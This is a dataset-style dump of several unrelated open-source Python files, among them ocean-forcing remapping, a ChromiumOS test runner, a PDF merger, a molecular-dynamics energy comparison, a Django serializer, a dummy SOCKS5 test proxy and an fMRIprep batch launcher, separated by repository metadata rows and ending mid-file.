varU = fileOut.createVariable("uOceanVelocity", "d",dimensions=["Time","nCells"])
varV = fileOut.createVariable("vOceanVelocity", "d",dimensions=["Time","nCells"])
varDhdx = fileOut.createVariable("seaSurfaceTiltU", "d",dimensions=["Time","nCells"])
varDhdy = fileOut.createVariable("seaSurfaceTiltV", "d",dimensions=["Time","nCells"])
varHblt = fileOut.createVariable("oceanMixedLayerDepth", "d",dimensions=["Time","nCells"])
varQdp = fileOut.createVariable("oceanHeatFluxConvergence","d",dimensions=["Time","nCells"])
print("Interpolate seaSurfaceTemperature")
arrayIn = fileIn.variables["T"][:]
arrayIn = fill_array(arrayIn)
arrayOut = interpolate_array(nCells, remapMatrix, arrayIn)
varSST[:] = arrayOut[:]
print("Interpolate seaSurfaceSalinity")
arrayIn = fileIn.variables["S"][:]
arrayIn = fill_array(arrayIn)
arrayOut = interpolate_array(nCells, remapMatrix, arrayIn)
varSSS[:] = arrayOut[:]
print("Interpolate uOceanVelocity")
arrayIn = fileIn.variables["U"][:,0,:,:]
arrayIn = fill_array(arrayIn)
arrayOut = interpolate_array(nCells, remapMatrix, arrayIn)
varU[:] = arrayOut[:]
print("Interpolate vOceanVelocity")
arrayIn = fileIn.variables["V"][:,0,:,:]
arrayIn = fill_array(arrayIn)
arrayOut = interpolate_array(nCells, remapMatrix, arrayIn)
varV[:] = arrayOut[:]
print("Interpolate seaSurfaceTiltU")
arrayIn = fileIn.variables["dhdx"][:]
arrayIn = fill_array(arrayIn)
arrayOut = interpolate_array(nCells, remapMatrix, arrayIn)
varDhdx[:] = arrayOut[:]
print("Interpolate seaSurfaceTiltV")
arrayIn = fileIn.variables["dhdy"][:]
arrayIn = fill_array(arrayIn)
arrayOut = interpolate_array(nCells, remapMatrix, arrayIn)
varDhdy[:] = arrayOut[:]
print("Interpolate oceanMixedLayerDepth")
arrayIn = fileIn.variables["hblt"][:]
arrayIn = fill_array(arrayIn)
arrayOut = interpolate_array(nCells, remapMatrix, arrayIn)
varHblt[:] = arrayOut[:]
print("Interpolate oceanHeatFluxConvergence")
arrayIn = fileIn.variables["qdp"][:]
arrayIn = fill_array(arrayIn)
arrayOut = interpolate_array(nCells, remapMatrix, arrayIn)
varQdp[:] = arrayOut[:]
fileIn.close()
fileOut.close()
def perform_remapping(\
filenameMPASGrid, \
filenameGx1Grid, \
filenameGx1OceanMixed, \
filenameMPASOceanMixed, \
scripDir):
print("create_scrip_file_MPAS")
scripGridFilename = "remap_grid_MPAS_tmp.nc"
create_scrip_file_MPAS(filenameMPASGrid, scripGridFilename)
print("create_scrip_file_gx1")
scripGx1Filename = "remap_grid_gx1_tmp.nc"
create_scrip_file_gx1(scripGx1Filename, filenameGx1Grid)
print("write_scrip_in_file")
write_scrip_in_file("gx1")
print("SCRIP")
cmd = scripDir + "/scrip"
os.system(cmd)
print("get_remapping_data")
filenameRemapping = "remap_gx1_to_MPAS_tmp.nc"
remapMatrix, dstGridSize = get_remapping_data(filenameRemapping)
print("create_forcing ocean climatology")
create_forcing(\
filenameGx1OceanMixed, \
filenameMPASOceanMixed, \
dstGridSize, \
remapMatrix)
if (len(sys.argv) != 2):
print("Usage: python create_ocean_forcing.py configFilename")
sys.exit()
config = ConfigParser.ConfigParser()
config.read(sys.argv[1])
filenameMPASGrid = config.get('forcing_generation','filenameMPASGrid')
filenameGx1Grid = config.get('forcing_generation','filenameGx1Grid')
filenameGx1OceanMixed = config.get('forcing_generation','filenameGx1OceanMixed')
filenameMPASOceanMixed = config.get('forcing_generation','filenameMPASOceanMixed')
scripDir = config.get('forcing_generation','scripDir')
perform_remapping(\
filenameMPASGrid, \
filenameGx1Grid, \
filenameGx1OceanMixed, \
filenameMPASOceanMixed, \
scripDir)
| true | true |
f725d7bce110226cd80cad4c972a9de2caa719fe | 1,365 | py | Python | hammerd/hammertests/hammertests_control_tp.py | emersion/chromiumos-platform2 | ba71ad06f7ba52e922c647a8915ff852b2d4ebbd | [
"BSD-3-Clause"
] | 5 | 2019-01-19T15:38:48.000Z | 2021-10-06T03:59:46.000Z | hammerd/hammertests/hammertests_control_tp.py | emersion/chromiumos-platform2 | ba71ad06f7ba52e922c647a8915ff852b2d4ebbd | [
"BSD-3-Clause"
] | null | null | null | hammerd/hammertests/hammertests_control_tp.py | emersion/chromiumos-platform2 | ba71ad06f7ba52e922c647a8915ff852b2d4ebbd | [
"BSD-3-Clause"
] | 1 | 2019-02-15T23:05:30.000Z | 2019-02-15T23:05:30.000Z | #!/usr/bin/env python2
# Copyright 2018 The Chromium OS Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
'''Control file for the following tests
rb_protection.py
'''
from __future__ import print_function
import os
import shutil
import sys
def main(argv):
if len(argv) > 0:
sys.exit('Test takes no args!')
iterations = 1
output_to_stdout = ' 2>&1 | tee '
python_prefix = 'python '
test_list = ['transfer_touchpad_works']
for test in test_list:
logs_dir = 'logs/' + test
if os.path.exists(logs_dir):
shutil.rmtree(logs_dir)
os.makedirs(logs_dir)
for i in range(iterations):
iteration_num = i + 1
print('==========================================================')
print('TEST NAME: ' + test)
print('ITERATION ' + str(iteration_num) + ' OF ' +
str(iterations))
print('==========================================================')
cmd = '{0}{1}{2}{3}{4}{5}{6}{7}{8}'.format(python_prefix, test,
'.py', output_to_stdout,
logs_dir, '/', test,
iteration_num, '.log')
os.system(cmd)
if __name__ == '__main__':
sys.exit(main(sys.argv[1:]))
| 29.673913 | 73 | 0.519414 |
from __future__ import print_function
import os
import shutil
import sys
def main(argv):
if len(argv) > 0:
sys.exit('Test takes no args!')
iterations = 1
output_to_stdout = ' 2>&1 | tee '
python_prefix = 'python '
test_list = ['transfer_touchpad_works']
for test in test_list:
logs_dir = 'logs/' + test
if os.path.exists(logs_dir):
shutil.rmtree(logs_dir)
os.makedirs(logs_dir)
for i in range(iterations):
iteration_num = i + 1
print('==========================================================')
print('TEST NAME: ' + test)
print('ITERATION ' + str(iteration_num) + ' OF ' +
str(iterations))
print('==========================================================')
cmd = '{0}{1}{2}{3}{4}{5}{6}{7}{8}'.format(python_prefix, test,
'.py', output_to_stdout,
logs_dir, '/', test,
iteration_num, '.log')
os.system(cmd)
if __name__ == '__main__':
sys.exit(main(sys.argv[1:]))
| true | true |
f725d8c9c18f752a5eb6f5c8c45f1e57f22267b2 | 2,782 | py | Python | AddSampleSheetBackPage.py | adambreznicky/smudge_python | af7ba221890253ac6fe7f38691b351861f8b3d96 | [
"MIT"
] | 1 | 2017-05-24T02:05:20.000Z | 2017-05-24T02:05:20.000Z | AddSampleSheetBackPage.py | adambreznicky/smudge_python | af7ba221890253ac6fe7f38691b351861f8b3d96 | [
"MIT"
] | null | null | null | AddSampleSheetBackPage.py | adambreznicky/smudge_python | af7ba221890253ac6fe7f38691b351861f8b3d96 | [
"MIT"
] | null | null | null | from PyPDF2 import PdfFileMerger
import operator
import os
def fileMerge(district, sorted_fileDict):
'''Creates a list of files to be exported for each district'''
print "Creating Bound PDF for %s District" % district
# Add path to the individual sample sheets
sampleSheetPath = "T:\\DATAMGT\\HPMS-DATA\\2013Data\\2013 Sample Sheets\\PDFs\\PDFs"
# Add the output path
outputPath = sampleSheetPath + os.sep + "Combined"
# Create an instance of the PdfFileMerger.merger class
merger = PdfFileMerger()
total = len(sorted_fileDict)
counter = 0
# Iterate through the sorted file dictionary view to export PDF's
for sampleID, fileName in sorted_fileDict:
counter += 1
print "...adding sheet %i of %i" % (counter, total)
input1 = open(sampleSheetPath + os.sep + fileName, "rb")
input2 = open("T:\\DATAMGT\\HPMS-DATA\\2012Data\\Field Reviews\\Field Review Sample Selection\\SectionID_Maps\\assets\\HPMS Back Page Worksheet - Copy.pdf", "rb")
# append entire input3 document to the end of the output document
merger.append(input1, "Sample " + str(sampleID))
merger.append(input2)
# Write to an output PDF document
output = open(outputPath + os.sep + district + "_District_Merged.pdf", "wb")
print "Saving bound PDF for %s District" % district
merger.write(output)
del merger
def createSampleSheetList():
'''Creates a list of files to be exported for each district'''
sampleSheetPath = "T:\\DATAMGT\\HPMS-DATA\\2013Data\\2013 Sample Sheets\\PDFs\\PDFs"
outputPath = sampleSheetPath + os.sep + "Combined"
if not os.path.exists(outputPath):
os.makedirs(outputPath)
sampleSheets = os.listdir(sampleSheetPath)
counter = len(sampleSheets)
if "Combined" in sampleSheets:
sampleSheets.remove("Combined")
district = ""
previousDistrict = ""
fileDict = {}
for sheet in sampleSheets:
district = str(sheet).split("_")[0]
sampleKey = int(((str(sheet).split("_")[3])).split(".")[0])
if district == previousDistrict or previousDistrict == "" or district is None:
fileDict[sampleKey] = sheet
previousDistrict = district
counter -= 1
elif counter == 1:
sorted_fileDict = sorted(fileDict.iteritems(), key=operator.itemgetter(0))
fileMerge(previousDistrict, sorted_fileDict)
fileDict = {}
fileDict[sampleKey] = sheet
else:
sorted_fileDict = sorted(fileDict.iteritems(), key=operator.itemgetter(0))
fileMerge(previousDistrict, sorted_fileDict)
fileDict = {}
fileDict[sampleKey] = sheet
previousDistrict = district
createSampleSheetList() | 39.742857 | 170 | 0.658519 | from PyPDF2 import PdfFileMerger
import operator
import os
def fileMerge(district, sorted_fileDict):
'''Creates a list of files to be exported for each district'''
print "Creating Bound PDF for %s District" % district
sampleSheetPath = "T:\\DATAMGT\\HPMS-DATA\\2013Data\\2013 Sample Sheets\\PDFs\\PDFs"
outputPath = sampleSheetPath + os.sep + "Combined"
merger = PdfFileMerger()
total = len(sorted_fileDict)
counter = 0
for sampleID, fileName in sorted_fileDict:
counter += 1
print "...adding sheet %i of %i" % (counter, total)
input1 = open(sampleSheetPath + os.sep + fileName, "rb")
input2 = open("T:\\DATAMGT\\HPMS-DATA\\2012Data\\Field Reviews\\Field Review Sample Selection\\SectionID_Maps\\assets\\HPMS Back Page Worksheet - Copy.pdf", "rb")
# append entire input3 document to the end of the output document
merger.append(input1, "Sample " + str(sampleID))
merger.append(input2)
# Write to an output PDF document
output = open(outputPath + os.sep + district + "_District_Merged.pdf", "wb")
print "Saving bound PDF for %s District" % district
merger.write(output)
del merger
def createSampleSheetList():
'''Creates a list of files to be exported for each district'''
sampleSheetPath = "T:\\DATAMGT\\HPMS-DATA\\2013Data\\2013 Sample Sheets\\PDFs\\PDFs"
outputPath = sampleSheetPath + os.sep + "Combined"
if not os.path.exists(outputPath):
os.makedirs(outputPath)
sampleSheets = os.listdir(sampleSheetPath)
counter = len(sampleSheets)
if "Combined" in sampleSheets:
sampleSheets.remove("Combined")
district = ""
previousDistrict = ""
fileDict = {}
for sheet in sampleSheets:
district = str(sheet).split("_")[0]
sampleKey = int(((str(sheet).split("_")[3])).split(".")[0])
if district == previousDistrict or previousDistrict == "" or district is None:
fileDict[sampleKey] = sheet
previousDistrict = district
counter -= 1
elif counter == 1:
sorted_fileDict = sorted(fileDict.iteritems(), key=operator.itemgetter(0))
fileMerge(previousDistrict, sorted_fileDict)
fileDict = {}
fileDict[sampleKey] = sheet
else:
sorted_fileDict = sorted(fileDict.iteritems(), key=operator.itemgetter(0))
fileMerge(previousDistrict, sorted_fileDict)
fileDict = {}
fileDict[sampleKey] = sheet
previousDistrict = district
createSampleSheetList() | false | true |
f725d8d28b3442d977bd49f6e51ed9adcdb15b84 | 698 | py | Python | GMX_TEST/DIP/DIFF.py | leelasd/OPLS-AAM_for_Gromacs | 50ff268525e9177e46175fdb122276c0045f1dab | [
"MIT"
] | 6 | 2017-10-14T10:10:51.000Z | 2020-12-11T15:19:39.000Z | GMX_TEST/DIP/DIFF.py | leelasd/OPLS-AAM_for_Gromacs | 50ff268525e9177e46175fdb122276c0045f1dab | [
"MIT"
] | 1 | 2019-06-18T20:37:23.000Z | 2019-06-18T20:37:23.000Z | GMX_TEST/DIP/DIFF.py | leelasd/OPLS-AAM_for_Gromacs | 50ff268525e9177e46175fdb122276c0045f1dab | [
"MIT"
] | 3 | 2020-07-10T10:41:58.000Z | 2021-11-14T19:30:05.000Z | import os
from collections import OrderedDict
import sys
fil = open('energy.xvg').readlines()
GMX_dat = [float(f)/4.184 for f in fil[-1].split()[1:-1]]
nfil = open('LOG_NAMD').readlines()
for line in nfil:
if 'ENERGY: 200' in line:
NAMD_DAT = [float(f) for f in line.split()[2:12]]
print(NAMD_DAT)
print('BOND_DIFF: %5.5f'%(GMX_dat[0]-NAMD_DAT[0]))
print('ANGL_DIFF: %5.5f'%(GMX_dat[1]-NAMD_DAT[1]))
print('TORS_DIFF: %5.5f'%(GMX_dat[2]-NAMD_DAT[2]))
print('IMPR_DIFF: %5.5f'%(GMX_dat[3]-NAMD_DAT[3]))
print('ELEC_DIFF: %5.5f'%(GMX_dat[5]+GMX_dat[7]-NAMD_DAT[4]))
print('VDWL_DIFF: %5.5f'%(GMX_dat[4]+GMX_dat[6]-NAMD_DAT[5]))
print('TOTL_DIFF: %5.5f'%(GMX_dat[8]-NAMD_DAT[9]))
| 36.736842 | 61 | 0.661891 | import os
from collections import OrderedDict
import sys
fil = open('energy.xvg').readlines()
GMX_dat = [float(f)/4.184 for f in fil[-1].split()[1:-1]]
nfil = open('LOG_NAMD').readlines()
for line in nfil:
if 'ENERGY: 200' in line:
NAMD_DAT = [float(f) for f in line.split()[2:12]]
print(NAMD_DAT)
print('BOND_DIFF: %5.5f'%(GMX_dat[0]-NAMD_DAT[0]))
print('ANGL_DIFF: %5.5f'%(GMX_dat[1]-NAMD_DAT[1]))
print('TORS_DIFF: %5.5f'%(GMX_dat[2]-NAMD_DAT[2]))
print('IMPR_DIFF: %5.5f'%(GMX_dat[3]-NAMD_DAT[3]))
print('ELEC_DIFF: %5.5f'%(GMX_dat[5]+GMX_dat[7]-NAMD_DAT[4]))
print('VDWL_DIFF: %5.5f'%(GMX_dat[4]+GMX_dat[6]-NAMD_DAT[5]))
print('TOTL_DIFF: %5.5f'%(GMX_dat[8]-NAMD_DAT[9]))
| true | true |
f725d93f74485f2e2384998211087edd14cd10b4 | 1,223 | py | Python | comment/serializers.py | vahidtwo/simpleSocialSite | 40d971f04b7127811b7e277ddb3068fb451e9574 | [
"MIT"
] | 1 | 2020-05-16T16:14:51.000Z | 2020-05-16T16:14:51.000Z | comment/serializers.py | vahidtwo/simpleSocialSite | 40d971f04b7127811b7e277ddb3068fb451e9574 | [
"MIT"
] | 5 | 2021-03-18T23:21:18.000Z | 2022-01-13T02:10:19.000Z | comment/serializers.py | vahidtwo/simpleSocialSite | 40d971f04b7127811b7e277ddb3068fb451e9574 | [
"MIT"
] | null | null | null | from django.db.models import Sum
from rest_framework import serializers
from like.models import Like
from .models import Comment
from accounts.serializers import UserSerializer
class CommentSerializer(serializers.ModelSerializer):
owner = UserSerializer(read_only=True)
like = serializers.SerializerMethodField()
def get_like(self, obj):
if type(obj) is Comment:
if obj._meta is Comment._meta:
liked = Like.objects.filter(comment_id=obj.id, value=1).aggregate(Sum('value'))['value__sum']
dislike = Like.objects.filter(comment_id=obj.id, value=-1).aggregate(Sum('value'))['value__sum']
liked = liked if liked else 0
dislike = dislike if dislike else 0
return {'liked': liked, 'disLiked': dislike}
return {'liked': 0, 'disLiked': 0}
def validate_post(self, attrs):
if not attrs:
raise serializers.ValidationError('post not send ')
def validate_comment(self, attrs):
if not dict(self.initial_data).get('post'):
if not attrs:
raise serializers.ValidationError('comment not send ')
def update(self, instance, validated_data):
instance.body = validated_data.get('body', instance.body)
instance.save()
return instance
class Meta:
model = Comment
fields = '__all__'
| 31.358974 | 100 | 0.739166 | from django.db.models import Sum
from rest_framework import serializers
from like.models import Like
from .models import Comment
from accounts.serializers import UserSerializer
class CommentSerializer(serializers.ModelSerializer):
owner = UserSerializer(read_only=True)
like = serializers.SerializerMethodField()
def get_like(self, obj):
if type(obj) is Comment:
if obj._meta is Comment._meta:
liked = Like.objects.filter(comment_id=obj.id, value=1).aggregate(Sum('value'))['value__sum']
dislike = Like.objects.filter(comment_id=obj.id, value=-1).aggregate(Sum('value'))['value__sum']
liked = liked if liked else 0
dislike = dislike if dislike else 0
return {'liked': liked, 'disLiked': dislike}
return {'liked': 0, 'disLiked': 0}
def validate_post(self, attrs):
if not attrs:
raise serializers.ValidationError('post not send ')
def validate_comment(self, attrs):
if not dict(self.initial_data).get('post'):
if not attrs:
raise serializers.ValidationError('comment not send ')
def update(self, instance, validated_data):
instance.body = validated_data.get('body', instance.body)
instance.save()
return instance
class Meta:
model = Comment
fields = '__all__'
| true | true |
f725d9770174732322b6fe8380b521e22d1f1a54 | 5,699 | py | Python | qa/rpc-tests/test_framework/socks5.py | kileer/monix | 86525601d5915f380976c9d2e686ad7f66db991f | [
"MIT"
] | 174 | 2018-01-16T13:26:52.000Z | 2022-02-16T15:12:10.000Z | qa/rpc-tests/test_framework/socks5.py | kileer/monix | 86525601d5915f380976c9d2e686ad7f66db991f | [
"MIT"
] | 32 | 2018-01-25T03:42:01.000Z | 2020-07-31T17:37:52.000Z | qa/rpc-tests/test_framework/socks5.py | kileer/monix | 86525601d5915f380976c9d2e686ad7f66db991f | [
"MIT"
] | 78 | 2017-05-26T15:23:40.000Z | 2021-07-07T10:47:37.000Z | # Copyright (c) 2015 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
'''
Dummy Socks5 server for testing.
'''
from __future__ import print_function, division, unicode_literals
import socket, threading, Queue
import traceback, sys
### Protocol constants
class Command:
CONNECT = 0x01
class AddressType:
IPV4 = 0x01
DOMAINNAME = 0x03
IPV6 = 0x04
### Utility functions
def recvall(s, n):
'''Receive n bytes from a socket, or fail'''
rv = bytearray()
while n > 0:
d = s.recv(n)
if not d:
raise IOError('Unexpected end of stream')
rv.extend(d)
n -= len(d)
return rv
### Implementation classes
class Socks5Configuration(object):
'''Proxy configuration'''
def __init__(self):
self.addr = None # Bind address (must be set)
self.af = socket.AF_INET # Bind address family
self.unauth = False # Support unauthenticated
self.auth = False # Support authentication
class Socks5Command(object):
'''Information about an incoming socks5 command'''
def __init__(self, cmd, atyp, addr, port, username, password):
self.cmd = cmd # Command (one of Command.*)
self.atyp = atyp # Address type (one of AddressType.*)
self.addr = addr # Address
self.port = port # Port to connect to
self.username = username
self.password = password
def __repr__(self):
return 'Socks5Command(%s,%s,%s,%s,%s,%s)' % (self.cmd, self.atyp, self.addr, self.port, self.username, self.password)
class Socks5Connection(object):
def __init__(self, serv, conn, peer):
self.serv = serv
self.conn = conn
self.peer = peer
def handle(self):
'''
Handle socks5 request according to RFC1928
'''
try:
# Verify socks version
ver = recvall(self.conn, 1)[0]
if ver != 0x05:
raise IOError('Invalid socks version %i' % ver)
# Choose authentication method
nmethods = recvall(self.conn, 1)[0]
methods = bytearray(recvall(self.conn, nmethods))
method = None
if 0x02 in methods and self.serv.conf.auth:
method = 0x02 # username/password
elif 0x00 in methods and self.serv.conf.unauth:
method = 0x00 # unauthenticated
if method is None:
raise IOError('No supported authentication method was offered')
# Send response
self.conn.sendall(bytearray([0x05, method]))
# Read authentication (optional)
username = None
password = None
if method == 0x02:
ver = recvall(self.conn, 1)[0]
if ver != 0x01:
raise IOError('Invalid auth packet version %i' % ver)
ulen = recvall(self.conn, 1)[0]
username = str(recvall(self.conn, ulen))
plen = recvall(self.conn, 1)[0]
password = str(recvall(self.conn, plen))
# Send authentication response
self.conn.sendall(bytearray([0x01, 0x00]))
# Read connect request
(ver,cmd,rsv,atyp) = recvall(self.conn, 4)
if ver != 0x05:
raise IOError('Invalid socks version %i in connect request' % ver)
if cmd != Command.CONNECT:
raise IOError('Unhandled command %i in connect request' % cmd)
if atyp == AddressType.IPV4:
addr = recvall(self.conn, 4)
elif atyp == AddressType.DOMAINNAME:
n = recvall(self.conn, 1)[0]
addr = recvall(self.conn, n)
elif atyp == AddressType.IPV6:
addr = recvall(self.conn, 16)
else:
raise IOError('Unknown address type %i' % atyp)
port_hi,port_lo = recvall(self.conn, 2)
port = (port_hi << 8) | port_lo
# Send dummy response
self.conn.sendall(bytearray([0x05, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00]))
cmdin = Socks5Command(cmd, atyp, addr, port, username, password)
self.serv.queue.put(cmdin)
print('Proxy: ', cmdin)
# Fall through to disconnect
except Exception as e:
traceback.print_exc(file=sys.stderr)
self.serv.queue.put(e)
finally:
self.conn.close()
class Socks5Server(object):
def __init__(self, conf):
self.conf = conf
self.s = socket.socket(conf.af)
self.s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.s.bind(conf.addr)
self.s.listen(5)
self.running = False
self.thread = None
self.queue = Queue.Queue() # report connections and exceptions to client
def run(self):
while self.running:
(sockconn, peer) = self.s.accept()
if self.running:
conn = Socks5Connection(self, sockconn, peer)
thread = threading.Thread(None, conn.handle)
thread.daemon = True
thread.start()
def start(self):
assert(not self.running)
self.running = True
self.thread = threading.Thread(None, self.run)
self.thread.daemon = True
self.thread.start()
def stop(self):
self.running = False
# connect to self to end run loop
s = socket.socket(self.conf.af)
s.connect(self.conf.addr)
s.close()
self.thread.join()
| 35.397516 | 125 | 0.572732 |
from __future__ import print_function, division, unicode_literals
import socket, threading, Queue
import traceback, sys
AddressType:
IPV4 = 0x01
DOMAINNAME = 0x03
IPV6 = 0x04
)
while n > 0:
d = s.recv(n)
if not d:
raise IOError('Unexpected end of stream')
rv.extend(d)
n -= len(d)
return rv
t__(self):
self.addr = None
self.af = socket.AF_INET
self.unauth = False
self.auth = False
class Socks5Command(object):
def __init__(self, cmd, atyp, addr, port, username, password):
self.cmd = cmd
self.atyp = atyp
self.addr = addr
self.port = port
self.username = username
self.password = password
def __repr__(self):
return 'Socks5Command(%s,%s,%s,%s,%s,%s)' % (self.cmd, self.atyp, self.addr, self.port, self.username, self.password)
class Socks5Connection(object):
def __init__(self, serv, conn, peer):
self.serv = serv
self.conn = conn
self.peer = peer
def handle(self):
try:
ver = recvall(self.conn, 1)[0]
if ver != 0x05:
raise IOError('Invalid socks version %i' % ver)
nmethods = recvall(self.conn, 1)[0]
methods = bytearray(recvall(self.conn, nmethods))
method = None
if 0x02 in methods and self.serv.conf.auth:
method = 0x02
elif 0x00 in methods and self.serv.conf.unauth:
method = 0x00
if method is None:
raise IOError('No supported authentication method was offered')
self.conn.sendall(bytearray([0x05, method]))
username = None
password = None
if method == 0x02:
ver = recvall(self.conn, 1)[0]
if ver != 0x01:
raise IOError('Invalid auth packet version %i' % ver)
ulen = recvall(self.conn, 1)[0]
username = str(recvall(self.conn, ulen))
plen = recvall(self.conn, 1)[0]
password = str(recvall(self.conn, plen))
self.conn.sendall(bytearray([0x01, 0x00]))
(ver,cmd,rsv,atyp) = recvall(self.conn, 4)
if ver != 0x05:
raise IOError('Invalid socks version %i in connect request' % ver)
if cmd != Command.CONNECT:
raise IOError('Unhandled command %i in connect request' % cmd)
if atyp == AddressType.IPV4:
addr = recvall(self.conn, 4)
elif atyp == AddressType.DOMAINNAME:
n = recvall(self.conn, 1)[0]
addr = recvall(self.conn, n)
elif atyp == AddressType.IPV6:
addr = recvall(self.conn, 16)
else:
raise IOError('Unknown address type %i' % atyp)
port_hi,port_lo = recvall(self.conn, 2)
port = (port_hi << 8) | port_lo
self.conn.sendall(bytearray([0x05, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00]))
cmdin = Socks5Command(cmd, atyp, addr, port, username, password)
self.serv.queue.put(cmdin)
print('Proxy: ', cmdin)
except Exception as e:
traceback.print_exc(file=sys.stderr)
self.serv.queue.put(e)
finally:
self.conn.close()
class Socks5Server(object):
def __init__(self, conf):
self.conf = conf
self.s = socket.socket(conf.af)
self.s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.s.bind(conf.addr)
self.s.listen(5)
self.running = False
self.thread = None
self.queue = Queue.Queue()
def run(self):
while self.running:
(sockconn, peer) = self.s.accept()
if self.running:
conn = Socks5Connection(self, sockconn, peer)
thread = threading.Thread(None, conn.handle)
thread.daemon = True
thread.start()
def start(self):
assert(not self.running)
self.running = True
self.thread = threading.Thread(None, self.run)
self.thread.daemon = True
self.thread.start()
def stop(self):
self.running = False
s = socket.socket(self.conf.af)
s.connect(self.conf.addr)
s.close()
self.thread.join()
| true | true |
f725d9b75a08ba36d8046190c73a204e849ad713 | 6,589 | py | Python | clpipe/fmri_preprocess.py | keithcallenberg/clpipe | da1120bdcf820ba922c0a72792024007b232428c | [
"MIT"
] | 10 | 2019-02-06T19:32:49.000Z | 2022-02-01T20:41:05.000Z | clpipe/fmri_preprocess.py | keithcallenberg/clpipe | da1120bdcf820ba922c0a72792024007b232428c | [
"MIT"
] | 96 | 2019-02-06T17:10:59.000Z | 2022-03-30T19:08:49.000Z | clpipe/fmri_preprocess.py | keithcallenberg/clpipe | da1120bdcf820ba922c0a72792024007b232428c | [
"MIT"
] | 6 | 2020-06-26T18:51:59.000Z | 2021-09-16T06:55:04.000Z | import os
import click
import sys
import logging
from .batch_manager import BatchManager, Job
from .config_json_parser import ClpipeConfigParser
from .error_handler import exception_handler
@click.command()
@click.argument('subjects', nargs=-1, required=False, default=None)
@click.option('-config_file', type=click.Path(exists=True, dir_okay=False, file_okay=True), default=None,
help='Use a given configuration file. If left blank, uses the default config file, requiring definition of BIDS, working and output directories.')
@click.option('-bids_dir', type=click.Path(exists=True, dir_okay=True, file_okay=False),
help='Which BIDS directory to process. If a configuration file is provided with a BIDS directory, this argument is not necessary.')
@click.option('-working_dir', type=click.Path(dir_okay=True, file_okay=False),
help='Where to generate the working directory. If a configuration file is provided with a working directory, this argument is not necessary.')
@click.option('-output_dir', type=click.Path(dir_okay=True, file_okay=False),
help='Where to put the preprocessed data. If a configuration file is provided with a output directory, this argument is not necessary.')
@click.option('-log_dir', type=click.Path(dir_okay=True, file_okay=False),
help='Where to put HPC output files (such as SLURM output files)')
@click.option('-submit', is_flag=True, default=False, help='Flag to submit commands to the HPC')
@click.option('-debug', is_flag=True, help='Flag to enable detailed error messages and traceback')
def fmriprep_process(bids_dir=None, working_dir=None, output_dir=None, config_file=None, subjects=None,log_dir=None,submit=False, debug=False):
"""This command runs a BIDS formatted dataset through fMRIprep. Specify subject IDs to run specific subjects. If left blank, runs all subjects."""
if not debug:
sys.excepthook = exception_handler
logging.basicConfig(level=logging.INFO)
else:
logging.basicConfig(level=logging.DEBUG)
config = ClpipeConfigParser()
config.config_updater(config_file)
config.setup_fmriprep_directories(bids_dir, working_dir, output_dir, log_dir)
if not any([config.config['FMRIPrepOptions']['BIDSDirectory'], config.config['FMRIPrepOptions']['OutputDirectory'],
config.config['FMRIPrepOptions']['WorkingDirectory'],
config.config['FMRIPrepOptions']['LogDirectory']]):
raise ValueError(
'Please make sure the BIDS, working and output directories are specified in either the configfile or in the command. At least one is not specified.')
singularity_string = '''unset PYTHONPATH; {templateflow1} singularity run -B {templateflow2}{bindPaths} {batchcommands} {fmriprepInstance} {bids_dir} {output_dir} participant ''' \
'''--participant-label {participantLabels} -w {working_dir} --fs-license-file {fslicense} {threads} {otheropts}'''
docker_string = '''docker run --rm -ti'''\
'''-v {fslicense}:/opt/freesurfer/license.txt:ro '''\
'''-v {bids_dir}:/data:ro -v {output_dir}:/out ''' \
'''-v {working_dir}:/work ''' \
'''{docker_fmriprep} /data /out participant -w /work {threads} {otheropts} --participant-label {participantLabels}'''
if config.config['FMRIPrepOptions']['TemplateFlowToggle']:
template1 = "export SINGULARITYENV_TEMPLATEFLOW_HOME={templateflowpath};".format(templateflowpath=config.config["FMRIPrepOptions"]["TemplateFlowPath"])
template2 = "${{TEMPLATEFLOW_HOME:-$HOME/.cache/templateflow}}:{templateflowpath},".format(templateflowpath =config.config["FMRIPrepOptions"]["TemplateFlowPath"])
else:
template1 = ""
template2 = ""
if not subjects:
subjectstring = "ALL"
sublist = [o.replace('sub-', '') for o in os.listdir(config.config['FMRIPrepOptions']['BIDSDirectory'])
if os.path.isdir(os.path.join(config.config['FMRIPrepOptions']['BIDSDirectory'], o)) and 'sub-' in o]
else:
subjectstring = " , ".join(subjects)
sublist = subjects
batch_manager = BatchManager(config.config['BatchConfig'], config.config['FMRIPrepOptions']['LogDirectory'])
batch_manager.update_mem_usage(config.config['FMRIPrepOptions']['FMRIPrepMemoryUsage'])
batch_manager.update_time(config.config['FMRIPrepOptions']['FMRIPrepTimeUsage'])
batch_manager.update_nthreads(config.config['FMRIPrepOptions']['NThreads'])
batch_manager.update_email(config.config["EmailAddress"])
if batch_manager.config['ThreadCommandActive']:
threads = '--nthreads ' + batch_manager.get_threads_command()[1]
else:
threads = ''
for sub in sublist:
if config.config['FMRIPrepOptions']['DockerToggle']:
batch_manager.addjob(Job("sub-" + sub + "_fmriprep", docker_string.format(
docker_fmriprep=config.config['FMRIPrepOptions']['DockerFMRIPrepVersion'],
bids_dir=config.config['FMRIPrepOptions']['BIDSDirectory'],
output_dir=config.config['FMRIPrepOptions']['OutputDirectory'],
working_dir=config.config['FMRIPrepOptions']['WorkingDirectory'],
participantLabels=sub,
fslicense=config.config['FMRIPrepOptions']['FreesurferLicensePath'],
threads= threads,
otheropts=config.config['FMRIPrepOptions']['CommandLineOpts']
)))
else:
batch_manager.addjob(Job("sub-" + sub + "_fmriprep", singularity_string.format(
templateflow1 = template1,
templateflow2 = template2,
fmriprepInstance=config.config['FMRIPrepOptions']['FMRIPrepPath'],
bids_dir=config.config['FMRIPrepOptions']['BIDSDirectory'],
output_dir=config.config['FMRIPrepOptions']['OutputDirectory'],
working_dir=config.config['FMRIPrepOptions']['WorkingDirectory'],
batchcommands=batch_manager.config["FMRIPrepBatchCommands"],
participantLabels=sub,
fslicense=config.config['FMRIPrepOptions']['FreesurferLicensePath'],
threads= threads,
bindPaths=batch_manager.config['SingularityBindPaths'],
